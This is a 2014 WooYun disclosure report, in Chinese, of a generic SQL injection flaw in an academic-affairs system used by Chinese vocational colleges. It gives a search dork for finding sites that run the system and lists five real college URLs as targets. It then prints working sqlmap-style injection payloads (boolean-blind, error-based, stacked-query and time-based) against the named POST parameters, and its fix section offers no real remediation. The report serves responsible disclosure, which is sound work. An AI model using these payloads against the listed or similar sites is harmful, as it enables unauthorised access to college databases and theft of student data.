漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-077423
漏洞标题:某高校在用教务系统通用SQL注射漏洞
相关厂商:cncert国家互联网应急中心
漏洞作者: by:龙少
提交时间:2014-09-26 18:04
修复时间:2014-12-25 18:06
公开时间:2014-12-25 18:06
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-09-26: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-02: 细节向第三方安全合作伙伴开放
2014-11-23: 细节向核心白帽子及相关领域专家公开
2014-12-03: 细节向普通白帽子公开
2014-12-13: 细节向实习白帽子公开
2014-12-25: 细节向公众公开
简要描述:
某高校使用的教务系统存在通用SQL注射
详细说明:
intitle:::教务信息网络
发现使用该套系统的都是一些高校,以高职院校为主!
通用的POST注入:/bkcx_reg.asp(补考安排查询系统)
存在注入的参数有两个:
1、bkkc =
2、cxbh=
按照要求枚举五个案例:
案例一:泰州职业技术学院:http://jwxt.tzpc.edu.cn/qmkscx_reg.asp
案例二:江海职业技术学院:http://jwgl.jhu.cn/qmkscx_reg.asp
案例三:苏州信息职业技术学院:http://szitu.cn:86/qmkscx_reg.asp
案例四:宿迁高等师范学校:http://222.187.199.60/qmkscx_reg.asp
案例五:常州工程职业技术学院:http://jwcx.czie.net/qmkscx_reg.asp
漏洞证明:
测试:
POST包:Place: POST
Parameter: xbdm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bksj=88952634&cxbh=88952634&bkkc=88952634&xbdm=01 ' AND 5187=5187 A
ND 'RhUr'='RhUr
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: bksj=88952634&cxbh=88952634&bkkc=88952634&xbdm=01 ' AND 1751=CONVER
T(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(103)+CHAR(104)+CHAR(113)+(SELECT (CASE WH
EN (1751=1751) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(99)+CHAR(106)+CH
AR(100)+CHAR(113))) AND 'rSgJ'='rSgJ
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: bksj=88952634&cxbh=88952634&bkkc=88952634&xbdm=01 '; WAITFOR DELAY
'0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: bksj=88952634&cxbh=88952634&bkkc=88952634&xbdm=01 ' WAITFOR DELAY '
0:0:5'--
常州工程职业技术学院:http://jwcx.czie.net/qmkscx_reg.asp
泰州职业技术学院:http://jwxt.tzpc.edu.cn/qmkscx_reg.asp
江海职业技术学院:http://jwgl.jhu.cn/qmkscx_reg.asp
苏州信息职业技术学院:http://szitu.cn:86/qmkscx_reg.asp
宿迁职业技术学院:http://222.187.199.60/qmkscx_reg.asp
修复方案:
如上所述!
版权声明:转载请注明来源 by:龙少@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2014-09-29 11:11
厂商回复:
最新状态:
暂无